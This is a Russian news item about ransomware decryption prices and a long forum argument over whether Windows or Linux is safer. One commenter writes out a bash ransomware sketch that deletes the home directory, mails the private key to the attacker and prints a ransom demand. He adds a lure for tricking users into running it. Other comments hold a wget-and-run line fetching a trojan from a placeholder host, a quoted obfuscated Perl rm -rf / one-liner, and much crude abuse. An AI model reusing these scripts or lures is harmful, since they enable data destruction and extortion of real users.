Вирус зашифровал файлы. Сколько стоит расшифровка?
Специалисты из Лаборатории Касперского опубликовали тарифы вирусописателей за расшифровку файлов: с частных пользователей от 1 тысячи рублей до нескольких десятков тысяч, с корпораций до 300 тысяч рублей.
Суть проблемы: беззащитность Windows перед вирусами приводит к тому, что рано или поздно поклонник продукции фирмы Microsoft получает на свой компьютер вирус. Вирус может просто бесцельно размножаться, а может надежно зашифровать все данные пользователя и потребовать за расшифровку денег. Если пользователь не делает резервные копии, проблема становится весьма серьезной. Ведь при аккуратной реализации криптостойкого алгоритма шифрования, единственный способ вернуть данные — заплатить вымогателю. И никакой антивирус Касперского тут не поможет.
Комментарии
Чингачгук
12 марта, 2015 - 22:29
Зачем такие сложности как алгоритм шифрования? Можно же просто зашифровать xor-ом со случайным вектором, выпросить денег, если дали, то повторять просьбу платёж повторить под различными предлогами и не высылать ключ. Алгоритм элементарен, ничего хранить не надо, лохов можно развести не однократно.
Да и вообще эта какая-то бредовая идея платить преступнику, не имея гарантий получения результата.
pomodor
13 марта, 2015 - 01:35
А как же лояльность клиента? Если обмануть, в следующий раз бабки уже не отправит.
Чингачгук
18 марта, 2015 - 18:15
>Можно же просто зашифровать xor-ом со случайным вектором,
Вы идиот, не пишите больше.
Чингачгук
14 марта, 2015 - 13:02
Бред сивой кобылы. С момента появления подобного дерьма в этих ваших интернетах я множество раз сталкивался с подобной оказией. Во всех случаях за компом сидели либо тупые п^зды, либо школьники-дебилы. От адекватных людей, которые не тыкают курсором без памяти куда ни попадя жалоб не поступало. Более того, у этих людей нет даже агрессивных adware, которых нынче более чем достаточно.
Причиной 99% проблем с компом и целостностью данных является не операционная система, а прокладка между стулом и клавиатурой.
pomodor
15 марта, 2015 - 00:21
Да, поклонник вантуза он такой: и ребенка дебилом обзовет, и женщину оскорбит, лишь бы выслужиться перед своим анальным покровителем. ;)
Чингачгук
15 марта, 2015 - 03:36
Мне, стало быть, следует Вас называть красноглазым упоротым луноходом? Вам не кажется, что Вы неправы? Нельзя оскорблять человека, о котором Вы ничего не знаете. Сам я, кстати, готов извиниться за фразу "Бред сивой кобылы" если вот это: "...беззащитность Windows перед вирусами приводит к тому, что рано или поздно поклонник продукции фирмы Microsoft получает на свой компьютер вирус." — Ваши личные мнение/выводы/умозаключение. Надеюсь, что нет, ибо писавший эту глупость соскочил в лучшем случае с семёрки, в худшем — с XP и особыми знаниями этих систем не отличается. Про более новые окна я и не говорю. Ни разу на Win 8.1 upd 3 со всеми последними обновлениями случаев описанного в Вашей статье залёта не возникало.
Я на MS ещё со времён DOS 5.0, в этом году 25 лет как, знаю все версии мелкомягких систем вдоль и поперёк. Так обожаемой Вами системой совершенно не брезгую, даже наоборот, хоть и не знаю её столь хорошо, как продукты MS. Просто в качестве основной на десктопе она мне не подходит, ибо не способна выполнять необходимые мне задачи. Неспособна в принципе. Софт специфический и узкозаточенный, существует только под Win, хотя один из его подвидов, есть в двух ипостасях: фронт — под Win, а сервак под линух.
А людям, никак не связанным с :
— госотчётностью, банк-клиентами — без ActiveX компонентов они не работают и криптопровайдера под *nix нету, в виртуалке эта херь не робит, нужны физические порты для ключей криптозащиты;
— Excel-простынями с многостраничными обработками на VBA — никто не будет переписывать десятки тысяч строк кода под LiO basic;
— задротством в ММОРПГ, и прочей поебенью — сам не играю и помочь в этом никак не могу;
— айТюнс-завимостью — это диагноз и лечению поддаётся с трудом, лень переубеждать;
— MS-пристрастием и заведомой неприязнью к иным системам — см. предыдущий пункт;
я и советую и устанавливаю именно линукс. Мне так проще, им так проще. Клиент счастлив, всё работает, рекомендации, бабло.
По поводу Вашего замечания — ни женщины, ни тем более дети не имеют никакого отношения к категориям граждан, указанных мною в предыдущем посте.
А ТП и дебилы не имеют пола и возраста. Посмотрите на тех, кто:
1) Даёт объявлениям типа «Скорая компьютерная помощь ООО «Хакер Плюс с выездом на дом";
2) От имени и по поручению этих контор бегают на вызовы;
3) Является клиентами подобных лохотронов.
В последнем случае — ТП и школьники-дебилы, а в первых двух — бывшие школьники, но с возрастом так и не поумневшие. Хотя в первом случае таки да, малость поумневшие и хитрожопые, ибо доить лохов — тупому не под силу.
Ведь спасение компьютеров от криворукости хозяев — это один из моих источников дохода и, глядя на этих, блджад, «конкурентов» и плоды их рукоблудства я просто х~уею, лучше бы они вообще них*я не делали, чем так, как они умеют . Так что своего мнения об этой категории людей я никогда не изменю по вполне объективным причинам.
Спасибо за внимание.
Извиняюсь за возможную сумбурность изложения мыслей.
Всего Вам доброго.
Чингачгук
10 октября, 2015 - 03:35
И что? Элементарно делается под линуксом. Всего-то пара десятков строк на том же bash. Всё что требуется — запихнуть в популярное место под видом темы к гному/кде, либо порт какого-нибудь сталкера:) Уверенный в неуязвимости линукса лошок и пароль рута введёт если надо будет для заражения, и ислам примет, и танец маленьких свиней спляшет — только бы завелось.
dk
10 октября, 2015 - 10:23
Ну против дурака с инициативой (в данном случае — с админскими правами) любая система бессильна. Не делать же систему с идеологией "Ты юзер настолько дурак, что даже на твоем компьютере мы тебе рулить не дадим"? Хотя, по сводкам с полей...
Чингачгук
10 октября, 2015 - 13:18
Макось?
Чингачгук
10 октября, 2015 - 14:18
Да и без админских прав всё прекрасно шифруется. Доступ к домашнему каталогу на чтение и запись есть? Есть. Ну а большего и не требуется чтобы лежащие там фотки кошаков и корпоративов пострадали вместе со всякими курсовыми и шансончиками. В /etc или /usr/bin ничего не запишется, ясный пень, — но оно и не нужно, юзер и так копеечку отдаст:) Если /home лежит на отдельном разделе и смонтирован с noexec и nosuid — задача малость усложняется, но всё равно разрешима.
Чингачгук
10 октября, 2015 - 17:11
OpenSSL в большинстве дистров установлен по умолчанию, значит сгенерить ключи и зашифровать файлы есть чем:) А дальше — никаких проблем.
#/bin/bash
tar -cvjf /tmp/home.tar.bz2 ~/*
rm -rf ~ # Содержимое хомяка упаковано в /tmp/home.tar.bz2, исходные данные уничтожены.
openssl genrsa -out ~/private.pem 2048
openssl rsa -in private.pem -out ~/public.pem -outform PEM -pubout
cat private.pem | sendmail мыло хакера
# закрытый ключ шифрования хакеру улетел на мыло. Можно и через ftp пнуть, или ещё как.
openssl rsautl -in /tmp/home.tar.bz2 -out ~/encrypted -inkey ~/private.pem -pubin -encrypt
rm ~/*.pem
rm /tmp/home.tar.bz2
echo Твои файлы зашифрованы, если они тебе нужны — пиши мне на мыло.
exit
Файлец сохраняем, создаём сайт, выкладываем скрипт туда. Пишем на глагне "Чувак, тебе в линуксе фотошоп нужен? А старкрафт? A голый Путин? Если да — качни этот файл, в наутилусе или какой там у тебя файлменеджер поставь ему право на исполнение и запусти". Всё, убунтята поведутся толпами:) Естественно код в том виде как я написал не сработает (ибо нефиг) — это чисто демонстрация идеи. Кому не нравится шифровать через openssl — может с помощью gpg то же самое запустить, суть не меняется.
Texnoline
11 октября, 2015 - 11:07
А зачем, писать то, что не сработает! Где же истина? Написали бы реальный скрипт со 100% эффективностью, детишки бы размяли пальцы, антивирусные компании выпустили бы свои пакеты приложений предотвращения новой угрозы!?:) Всем польза была бы...А так, сложно сублимированные данные никому не помогут!:( Время потеряли и пользователя заставили терять свое!
Чингачгук
11 октября, 2015 - 12:46
Мне оно надо — лишать школьников копеечек, которые им мама на обед дала?:) Вместе с иллюзиями о неуязвимости линукса. Ещё 2003 году на Linux.org.ru появилась провокация: автор опубликовал «программу из одной строчки на Perl» и попросил подсказать, почему она не работает:
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'
Эта программа на поверку оказалась хорошо замаскированным rm -rf /. При попытке запуска её из аккаунта root пользователь мог поплатиться всеми подмонтированными с возможностью записи файловыми системами.
comrade
11 октября, 2015 - 12:59
А если бы такого типа пользователь просто тупо напился и выкинул бы свой компьютер с 16 этажа? По-вашему опять получится, что линукс виноват?
(...Довёл проклятый, не вынесла душа поэта;-)
____________________
И в Вашей любимой солярке разве какой-то другой
rm -rf /
?(-:
Чингачгук
11 октября, 2015 - 13:14
На солярке права рута можно ограничить вообще-то. В 10 версии эта возможность появилась. За счёт зон (нечто вроде линуксового chroot или фришного jail, только сделанное по уму) и разбиения рутовых привилегий на базовые права, не все из которых доступны через su или тому подобный механизм.
Texnoline
11 октября, 2015 - 19:59
Хм,
ВеликаяSolaris v.10!-;)И множество удаленных дыр в 2014 году(24.11.2014), типа
CVE ID:
CVE-2014-3466
CVE-2014-3467
CVE-2014-3468
CVE-2014-3469
(Отказ в обслуживании, Обход ограничений безопасности, Компрометация системы ), с вектором эксплуатации: удаленно! Даже эксплойт, не нужен был!:)
И после этого, очень сложно говорить, что она безопаснее Linux OS!?
Чингачгук
11 октября, 2015 - 23:33
Какой Linux? Слака? Арч? Убунта? Красная шапка? При существующем зопарке из 100500 дистров если находится дырка к примеру в yast, то не использующие эту ненужную штуку особо не страдают, зато дырочка в ядре или glibc — и в очередной ботнет отправляются все:) Так что линукс безопаснее только в случае предвзятого подсчёта типа "это убунтовская дырка, мою мандриву она не касается". А эксплойт и на линуксе не всегда нужен: помню я дырку в gnome-screensaver, из-за которой он благополучно падал если кнопку Esc нажать и подержать пару секунд. Результат: вводить пароль чтобы гномовскую сессию разблокировать на чужом компе было абсолютно незачем, как и заморачиваться с его подбором:) Дырка третьегномовская, а он кроме линукса нигде не водится и потому можно считать чисто линуксовой.
dk
8 ноября, 2015 - 15:36
Это получается что для использования:
1. Нужен физический доступ к компьютеру и главное
2. Третьегном, который хоть и водится на линуксах, но далеко не на каждом. (Кстати а разве на BSD его не было?).
Чингачгук
8 ноября, 2015 - 13:58
Безопасный линукс такой безопасный, чо.
Чингачгук
8 ноября, 2015 - 14:23
а где эти вирусы, я за много лет не поймал ни одного? Хоть кто нибудь из посетителей сайта у кого был опыт расскажите как вы словили вирус, что это был за файл и каким образом его запустили (произошло заражение). Честно без всякого сарказма, мне просто интересно.
Чингачгук
8 ноября, 2015 - 14:32
Не поймали или думаете, что не поймали?:) Хотя если дурвеб не врёт, то заражение такой штукой сложно не заметить. У меня вот под виндой тоже почему-то вирусы не особо попадаются, как бы линуксоиды ни истерили и ни запугивали: последний года 4 назад на чужой флешке видел, да и то его подлый Symantec Endpoit Protection грохнул раньше чем запуститься успел. Может потому что на файлопомойках краки для фотошопа не ищу и всякие ZverCD не испольую?
Чингачгук
8 ноября, 2015 - 14:43
вирус шифрует дохрена всего — как можно не заметить? :)) Ну я не конкретно про этот вирус спрашиваю потому что написан специально для серверов, и не знаю как на русском, на оффициальном сайте сказанно нужны права админа:
а на винде схлопотать вирусняк проще простого, по моему опыту пользователи чаще всего попадаются на самораспаковывающиеся архивы экзешники, и скрытое расширение файла тоже наруку кулхацкеру.
Чингачгук
8 ноября, 2015 - 14:59
Насчёт того что написано это дело специально для серверов — неправда, с десктопной машиной тоже сработает на раз. И если угробленную /var/lib я и с инсталляционного диска оживлю, то с /home всё куда интереснее:) Рутовые права без проблемы получаются через эксплойты, которых для линукса не сильно меньше чем под винду, после чего всё нужное спокойно жертве удалённо закачивается и запускается.
Да и под линуксом запросто после того как выйдешь за пределы огороженной автором дистра свободки и в стандартных репах нужной софтины не окажется:). Лезешь читать форумы и для всяких убунт с дебианами видишь совет: подключи стороннюю репу и поставь из неё то-то и то-то. Чем это по сути отличается от виндового качания с торрентов по существу? На GNOME-Look в своё время троянца под видом скринсейвера сунули и пипл благополучно схавал.
dk
8 ноября, 2015 - 15:29
Это, кстати, да — народ тоже удивлялся, как данный вирус сервер от десктопа отличать должен :)
И нафига
козе баянexec на /home?Ну если это репозиторий программы — то тем, что ты качаешь пакет напрямую от автора, а не неизвестно кем собранный и допиленный exe в торренте. Другой вопрос — доверяем ли мы автору — но тут уж каждый ССЗБ.
Чингачгук
8 ноября, 2015 - 15:40
Зачем для шифрования /home там exec-то нужен? wget -c -P /tmp www.левый адрес.com/troyan.sh && sh /tmp/troyan.sh — и вот оно, счастье.
dk
8 ноября, 2015 - 15:55
Пардон про exec уже говорили — http://liberatum.ru/exclusive/virus-zashifroval-fajly#comment-53340
dk
8 ноября, 2015 - 14:39
https://vms.drweb.ru/virus/?i=7703983&lng=ru
Это получается, что его надо
1. Положить на сервер.
2. Запустить от рута.
Неплохие требования.
Чингачгук
8 ноября, 2015 - 14:41
Либо поиметь рутовые права через одну из 100500 дырок в shell, ядре, openssl или ещё где-то. Разве нет?
Чингачгук
8 ноября, 2015 - 14:49
поиметь это волшебное слово, для этого надо имелку хорошую иметь. 100500 дырок — так это все сервера в мире падали бы через несколько минут после запуска. Кроме сообщения что появился вирус ничего другого не слышно
Чингачгук
8 ноября, 2015 - 15:02
Да не нужна хорошая имелка. Нужен nmap и база эксплойтов. И то и другое общедоступно. Или под линем ботнетов не было никогда?
comrade
8 ноября, 2015 - 15:39
Лично не раз пользовался для лечения виндовсов антивирусниками дрвеба и касперского, которые для запуска используют линукс.
Но уважаемый оппонент, как самый умный в здешней песочнице, конечно же, немедленно приведёт 100500 примеров антивирусных систем, предназначенных для лечения линукса (да ещё и на виндовсе сделанных;-).
Чингачгук
8 ноября, 2015 - 15:50
LiveCD? Ну да, есть такие. Лечат они или калечат — другой вопрос, доводилось потом файловую систему пару раз чинить у клиентов по причине того, что обращение к виндовым дискам в этих LiveCD шло через ntfs-3g — то ещё дерьмище.
А на это я отвечу любимым линуксовым аргументом когда речь идёт о чём-то в лине напрочь отсутствующем:) Нинужен. Сколько там линуксов на десктопе — от процента до полутора если быть очень уж оптимистичным? Сколько из них готовы платить за это дело? Для серверных же решений на базе линукса антивирусные продукты точно не в дефиците: Avira, Symantec, Dr.Web, каспер и куча других.
comrade
8 ноября, 2015 - 16:09
«Для серверных же решений на базе линукса антивирусные продукты точно не в дефиците: Avira, Symantec, Dr.Web, каспер и куча других.»
— Которые, прежде всего, используются для проверки всякого прокачиваемого виндозного говна – в письмах и трафике.
========
Ну, и понятно, что у др.веба и касперского нет великого Вас, а сидят недоучки всякие, вместо грамотных спецов-программистов. Вот и выбрали для LiveCD вместо надёжнейшей системы какое-то недоразумение, которое "компьютеры калечит".
(-;
Чингачгук
8 ноября, 2015 - 16:18
То есть ваш
хламClam неспособен даже на такое?:)Десяток лет назад вместо убогого ntfs-3g в линуксе была нормальная, хотя и малость тормознутая приблуда для работы с NTFS. Не калечившая диски, корректно работавшая с расширенными атрибутами, сжатием и прочими файловыми потоками. Captive NTFS — не знаю, слышали про такое или нет. captive-1.1.7 от 2006-01-26 была последней версией. Про парагоновский драйвер NTFS для линукса ничего не скажу — не имел с ним дела. NTFS-3G и штатный драйвер NTFS в ядре линукса — дерьмо.
Texnoline
8 ноября, 2015 - 16:51
Дермище-то, называются костылями (ntfs-3g) для работы с дерьмом в виде, ntfs!
:)
Так вирусов, не требующих установки права root, не много..., где-то в районе сотни в экосистеме Linux, в отличии от безбрежного океана в миллиарды — под Windows, ибо 90 % пользователей, вообще не соображают в области вирусных аспектов технологий применяемых в быту!
Чингачгук
8 ноября, 2015 - 17:15
То-то на лоре, опеннете и англоязычных ресурсах оптом рыдают что нормальную файловую систему хотят вместо ext*, а её всё нет и нет:) Reiser4? Вряд ли взлетит. BTRFS? С 2007 пилят серьёзные люди вроде Oracle, но до стабильного состояния так и не довели. ZFS? Лицензия не позволяет прямо в ядро воткнуть — только модулем и так по всем пунктам. Чтобы даже безнадёжно устаревшую NTFS качественно угробить — надо или линукс, или дефектное железо, всё остальное она переживёт:) Про идущую ей на замену и вполне юзабельную на прямо сейчас ReFS я вообще молчу, в линуксе даже аналога нет.
Пользователь, чей хомяк был угроблен не от рута конечно же неимоверно обрадуется этому факту:) Подумаешь — семейные фотки за 20 лет погибли вместе со всякими диссертациями, зато враг ничего в /usr/sbin не смог записать, вендекапец близок как никогда! А не соображающие виндуятники вообще-то или учатся, или к соображающим обращаются на тему как и что замутить дабы не пострадать.
Texnoline
8 ноября, 2015 - 18:00
Знаю такую, от легендарной IBM — JFS, называется:)
Личный опыт, на работе в гос.конторе в далеком уже 2006 году, стояло два PC:
— один, рабочая станция от IBM (1995 года выпуска) - на двух разделах jfs, так с ней, после отключения электросети, никогда не было проблем с файловой системой (он не обслуживался 10 лет, до моего прихода...), работал 10 лет без UPS!
— второй, сервер на Windows 2003, все тома под ntfs - в один плохой день, для меня и пользователей, а это отдел гидрологии одного из республиканских центров по мониторингу окружающей среды сгорел UPS и потом рухнула ntfs. В итоге остался без выходных и 40 часов восстанавливал архивные данные с 1980 года включительно! И это всего за 3 года — называется почувствуйте разницу...
:(
Чингачгук
8 ноября, 2015 - 18:20
JFS и я знаю. По OS/2 4.5, она же Aurora. Поскольку особого впечатления на меня по сравнению с HPFS386 не произвела, на линуксе особо не смотрел.
Железячная проблема, как и говорил. Думаете, ext4, xfs, btrfs и что там ещё сейчас модно, стильно, молодёжно такое бы успешно победили? Рыданий про погибшую reiserfs к примеру я столько наслышался, что век помнить буду:)
Чингачгук
8 ноября, 2015 - 16:21
какие еще ботнеты — имеете в виду ту новость, где использовалась уязвимость рутеров по причине слабых паролей и брута? Раз вы такой матерый админ приведите пример рабочего экплойта который сработает сейчас без проблем на моей машине — поставлю винду и забуду о линухе
Чингачгук
8 ноября, 2015 - 16:30
Не роутеры, так не роутеры. Слова для гугления: "linux botnet BillGates". Плачи пострадавших можно найти на forums.debian.net к примеру. CentOS тоже под раздачу попадала.
comrade
8 ноября, 2015 - 14:49
Т.е., Вы нам рассказываете, что нехорошо запускать непонятно какие программы, скаченные неизвестно откуда? Полностью с Вами согласны!
Кстати, для пользователей какой системы такое поведение более характерно?... (-;
(И идеология, принципы и возможности какой системы этому способствуют?)
Чингачгук
8 ноября, 2015 - 15:05
Убунту. Радостная школота, начитавшись про неуязвимость линукса и полное отсутствие под него всяких троянов и вирусов ордами ломится качать и запускать всё что видит.
comrade
8 ноября, 2015 - 15:20
Ну и где же они – эти орды "заряженных"? ((-:
Чингачгук
8 ноября, 2015 - 15:34
А как среднестатистический убунтёныш или федораст поставивший нехорошее с левой репы сможет обнаружить, что его поимели? Я серьёзно интересуюсь. Если порнобаннера на весь экран не будет, то так и продолжит считать что ему сухо и комфортно. Антивирь? Не нужен, вирусов в линуксе нет:) Файрволл уровня приложений, который заорёт "Эй, начальник, у тебя какой-то левый бинарник по непонятному адресу в инет лезет — пустить или нет?" Не, не слышали про такое. Это в насквозь небезопасной винде при дефолтных настройках антивирь в комплект входит, файрволл предупреждает что левая программка сервером поработать захотела, а UAC предупреждает что найденный в просторах инета заменитель блокнота при запуске админские права почему-то захотел.
comrade
8 ноября, 2015 - 15:57
Виндовсовкие ноутбуки продают, обычно, с каким-нибудь триальным "нортоном", который через месяц отрубается и болтается мёртвым грузом, прося денег.
А встроенный антивирус при этом не заводится, т.к. другой антивирус не убран.
Кстати, встроенный антивирус добавлен аж в виндовсе 8, т.е. через 20 лет "безопасной" истории виндовса;-)
Пароль администратора, который по умолчанию требуется в линуксе, всё-таки надёжнее чем UAC. Т.к. виндозные пользователи более дикие, и просто привыкли жать Да-Да-Да...
Виндозный фаервол, с умолчальными настройками, ведёт себя как тихая мышка – его не видно и не слышно. Главное, чтобы пользователи не жаловались – что у них "интернет как-то не так работает"(-;
Чингачгук
8 ноября, 2015 - 16:07
Без проблемы сносится. У Symantec, каспера, F-Secure и других серьёзных разрабов с офсайта легко качается деинсталлятор если стандартный метод (через "Программы и компоненты" в панели управления) не работает или работает неправильно.
С фига ли более дикие? Они-то как раз знают что такое вирусы и что не стоит запускать что попало если тебе твои рефераты и фотки с корпоратива нужны незашифрованными. А вот линуксоиды рутовые пароли как раз и долбят при каждом чихе — безопасная система же:)
Тихо как мышка он себя ведёт до тех пор пока запущенная и отсутствующая в его правилах софтина порт для входящих подключений не откроет дабы сервером поработать. Исходящие соединения он особо не отслеживает и тут Вы правы. Но разве линуксовый iptables себя в этом вопросе ведёт хоть чуть лучше? Равно как фряшный или опеночный pf.
Texnoline
8 ноября, 2015 - 16:42
Уважаемый, что за подход гопника? Всякие пацанчики и фраеры Вам жить не дают, видно...
А хотя, ладно буду с вами на вашем же диалекте субкультурном, разговоры разговаривать:
1. виндовозный "хомячок", ничего порой знать не хочет — о правильной настройки firewall and antivirus — максимум скачать и нажимая "всего ОДНУ кнопочку" его установить, а потом через пару дней, или как повезет в его жизни, словить закриптованный троян или всякую малварь!
2. А где, по умолчанию в Windows XP/7/8 -входят по умолчанию, вместе с системой антивирусные приложения, которые уровня коммерческих продуктов, тех же Norton, Dr.Web и т.д.?
Чингачгук
8 ноября, 2015 - 16:59
Не менее уважаемый, а Вы почитайте перлы здешних типа линуксоидов — будете неприятно удивлены тем, что на их фоне я просто образец интеллигентности и вежливости. В теме про убунту 15.10 хотя бы или в любой про Win10. Ссылок не даю, поскольку незарегистрированным пользователям не положено — но места для поисков я подсказал.
Как и линуксоидные хомячки. Думаете тут много народу способно самостоятельно написать правило для iptables, запрещающее конкретному приложению лезть в инет по конкретным адресам или что-то подобное? Или я эту публику не знаю? О, поставил я убунту, получил +100500 к ЧСВ и три раза по столько к понтам:) Понтоваться надоело через час, захотел в какую-нибудь Modern Warfare поиграть между уроками — опаньки, нет такого в моём центре приложений, жизнь — боль:( Полез в гугл, нашёл там про какой-то wine, не осилил. А тут раз — и посоветовали добрые люди на убунтовском или аналогичном форуме: друг, ты терминал запусти, sudo su root в нём набери, потом свой пароль введи (а в убунте и возможно всяких минтах этого для счастья хватит:) и скопируй туда вот эти десяток строк. Конец немного предсказуем.
Там же, где и в линуксе, очевидно. Уж на что стандартный Windows Defender убог, но он куда лучше линуксового же дефолтного clam (если clam в данном конкретном дистре вообще устанавливается по умолчанию, что сильно не факт).
Texnoline
8 ноября, 2015 - 17:31
Это хорошо, что я вижу уважение у пользователя Windows! Честно...
, попробуйте ради личного эксперинса: GUI в виде: "настройка межсетевого экрана" в Ubuntu? Для среднестатистического "хомячка", там легкая настройка и портов и протоколов основных, честно подсказал сейчас Вам!
, так Steam в помощь, несколько сотен игр, из них десятки ААА-класса? Или этого мало...для человека не подсевшего на игровую фобию...
Так для этого и нужен мозг у хомячков, а не говно, чтобы не запускать или чтобы хотя бы забить команду копипастом, в любой поисковик и прочитать в 10-ке топов, что это означает!?
Чингачгук
8 ноября, 2015 - 18:08
Если быть справедливым, то основная масса зарегистрированных тут хоть линуксоидов, хоть виндузятников — люди адекватные и вменяемые. Мат и прочее идут в основном от анонимусов. Поскольку анонимных линуксоидов тут бывает больше, то впечатление от ресурса немного предсказуемо, тем более здешние модеры судя по всему трут комменты только со стороны наших.
Мне не нужно, я правила для iptables уже давно привык руками писать:) Спасибо начальству за сервак на Scientific linux, на котором крутится пыхпых, апач, слон и прочая мелочь. Но опять же это не решает глобальных проблем netfilter, про которые я говорил. Во-первых он не интерактивен и если отсутствующая в его списках софтина сетевое соединение откроет — он её не тормознёт чтобы спросить у пользователя как поступить. Во-вторых он не всегда позволяет фильтровать трафик по имени команды, а PID — критерий ненадёжный: запустил я софтину — он один, закрыл и запустил снова — другой. Можно, конечно, соорудить конвейер из ps, grep и iptables, чтобы к примеру запущенное прямо сейчас в Wine за пределы 192.168.0.1/16 не вылезло или пересобрать ядро чтобы iptables в цепочке OUTPUT аргумент --cmd-owner понимал — но вряд ли это сделает гуёвый конфигуратор или среднестатистический хомячок руками:)
А если для счастья нужна конкретная игра, в стиме напрочь отсутствующая? Или без нативного линуксового порта, зато отказывающаяся запускаться в Wine? Либо с отстойнейшей линуксовой версией? Чтобы "Ведьмак 2" на линуксе заработал — разрабам пришлось в ядро изменения внести, помнится, и всё равно работало через раз и через задницу:)
А вот тут у винды и преимущество: команд меньше:) Значит и выучить проще. Правда с развитием PowerShell, не уступающему по крутизне всяким bash и zsh ситуация ухудшится.
Texnoline
8 ноября, 2015 - 18:33
Лично,сейчас поставил вашему комментарию — 3 звезды, ибо правильно!
1. Анонимов уважаю, ибо с 2010 лично поддерживал "великий" THE PLAN!
:)
2. в своей деятельности лично учу пользователей, как и Linux, а также Windows, при проблемах — сначала думать головой, а потом касаться ручками клавы,...сам пользуюсь, только при проблемах — терминалом в Linux, а в быту только GUI!
:)
3.
, увы, что есть — то есть... но это первая проблема издателей и разработчиков, а потом тех, кому для физического или морального счастья, необходимо конкретное игровое приложение!
:(
4.
Согласен и тут, но какой ценой — проще?
До 2009 года пользовался на работе и дома только Windows (от 95 и до Vista), реально бэкапил до 8 DVD, c образами системы и софтом, постоянно искал стабильные версии приложений и тратил кучу времени на это...!
Теперь же — уже 6 лет, у меня всего три бэкапа — в три месяца, один в облаке mega, второй на личном сервере в USA, третий на внешнем USB SSD!
Так я реально заметил, экономию сил, средств и времени в своей личной и профессиональной жизни!
:)
Чингачгук
8 ноября, 2015 - 18:51
Мой первый Linux в далёком 1999 году занимал 6 трехдюймовых дискет, ставился на раздел с FAT16 и запускался из MSDOS командой loadlin.exe. Ядро 1.0 с чем-то, в комплекте были иксы (modeline для своего Cirrus Logic в /etc/X11/XF86Config считал и прописывал вручную:) и в качестве браузера — Mosaic. Если говорить о первом User Friendly — это был Mandrake 7, компакт с которым попал в руки спустя год-два. Первая винда была 3.1 for workgroup году в 93. Вроде могу сравнивать и то, и другое объективно — третий десяток лет за компом:) И свою первую любовь — полуось помню, и BeOS и много чего ещё.
В винде временами реально не хватает всякой юниксовой мелочи, идущей штатно в комплекте. Скачать порты с gnu.org не проблема (хотя порта того же dd под винду нет и не будет), но обнаруживать отсутствие нужной прямо сейчас утилитки на чужой машине бывает досадно.
Texnoline
8 ноября, 2015 - 17:02
И при всем, эта самая
"школота"не создает обширные бот-неты?При этом всем, не страдает жлобливыми форумными посиделками, оля " где мне скачать ключик, на мой любимый Nero(подставить по вкусу...)"!?
И даже при юзании Ubuntu Linux,
"школота"эта, изучает хоть и в мизерном количестве, но все же и архитектуру ОС и пытается запомнить нужные команды в терминале!Чингачгук
8 ноября, 2015 - 17:18
Ботнет из Linux-устройств разросся настолько, что может генерировать атаки с потоком более 150 Гбит/с, что многократно превышает запас прочности инфраструктуры среднестатистической компании. О начале подобных DDoS-атак сообщили исследователи из Akamai Technologies.
Сетевой червь, более известный как XOR DDoS, при помощи которого и был собран ботнет, выявили еще в сентябре 2014 года. Исследователи из Akamai Technologies утверждают, что последние DDoS-атаки ботнета имели «мощность» от нескольких, до 150 Гбит/с, а нападению подвергаются до двадцати целей в сутки. Пока основной удар принимает на себя азиатский регион — более 90% целей ботнета XOR DDoS находится именно там. Атакуют, в основном, компании работающие в сфере онлайн-игр, а также образовательные учреждения.
XOR DDoS является одним из нескольких сетевых червей, которые нацелены конкретно на Linux-системы. Деятельность группы, управляющей зловредом, отражает общую тенденцию по инфицированию оборудования и использования этих мощностей для проведения, в первую очередь, DDoS-атак. Наиболее уязвимыми являются плохо или вовсе не настроенные должным образом системы, а так же «заброшенное», но подключенное к сети оборудование. Исходя из статистики последних двух лет, последнее в особенности касается маршрутизаторов.
«Десять лет назад Linux позиционировался как безопасная альтернатива Windows, которая в то время серьезно страдала от атак, львиная доля которых приходилась именно на это семейство ОС. Из-за этого Linux все чаще и чаще применялся и применяется для повышения уровня информационной безопасности, но поскольку сфера применения этой системы расширилась, расширились и возможности киберпреступников. Сейчас злоумышленники активно развивают тактику и инструментарий для атак на Linux-системы, поэтому системные администраторы и специалисты по безопасности должны ужесточать свою политику на местах», — прокомментировали в Akamai Technologies.
Texnoline
8 ноября, 2015 - 17:40
А что было до 2014 года, приведите плизз — данные по количеству малых и средних ботнетов из десктопов под Windows, чтобы можно было найти "среднюю температуру по больнице"?
А это — обратная сторона всей IT, если бы у легендарных QNX и Open BSD, был бы такой же рост на дешевых китайских роутерах, то мы бы в 98% случаев видели бы тоже самое...:(
Чингачгук
8 ноября, 2015 - 18:24
Если конкретно мой линуксовый сервак попадает в ботнет — я реально должен радоваться, что виндовых или там макинтошных машин в других ботнетах больше? Просто непонятно.
Texnoline
8 ноября, 2015 - 18:38
2 звезды, ибо — реально нет, и это не зависит от Вас лично, в прямом смысле!:) Это зависит и от подготовки создателей ботнета, и еще от нескольких тысяч других причин. Реально не зависит от Вас, также то, что когда вы можете попасть под дождь, а потом подхватить воспаление легких, или все же — это зависит от вашего организма, и плохой реакции иммунной системы, на внешние воздействия?
Чингачгук
8 ноября, 2015 - 19:03
Что-то не слыхал я про ботнеты на базе Cisco IOS и прочих серьёзных железках. Хотя ддосить врага с захваченного магистрального роутера — это же просто мечта:) Всё остальное ломается примерно с одинаковой лёгкостью. Я уже упоминал линуксовый ботнет BillGates, цитирую хабр:
"На днях начальница пригнала своего сынишку поучиться уму-разуму, а так как дарование впервые видит серверную ОС, то решение учить пацана выпало на старый ubunt-овский сервер с LAMP-ом на борту (Linux + Apache + MySQL + PHP). Благо на нем тестируют проекты перед показом в свет.
После вводных лекций и кучи выданной макулатуры на сервере был создан новый недоюзер, который благополучно был добавлен к зоопарку SSH, и присвоен стандартный пароль в виде «Thispasswordiscrypt». В процессе обучения недоюзеру надоело вводить длинный пароль и он без ведома сменил его на «fack_off». В то время мы проходили бэкапы БД и выборочно сервера, но по каким-то богу известным причинам под его учеткой не завелось восстановление БД. Не сильно парясь, я добавил ему повышенные привилегии. Теперь все ОК, начальница в ажуре. Так как мама рядом, и курить нельзя, то на перекур хожу только я, а он грызет гранит науки.
На следующий день от планктона пошли заявки о медленно работающем, а то и совсем не работающем интернете. Перерыл все, но проблему так и не нашел. Поскольку тестировщики гоняли тесты на злополучном сервере, я не заметил процесс, пожирающий свободный ресурс.
Ближе к вечеру, а именно обедом, когда все в прострации и ничего не делают, все таки заметил причину падения всемирно-глобальной сети под название Интернет. Как выяснилось позже, сын начальницы осознал вину и пришел с покоянием, попутно рассказывая, что сменил свой пароль к учетке, обновил apache и копался в настройках ssh.
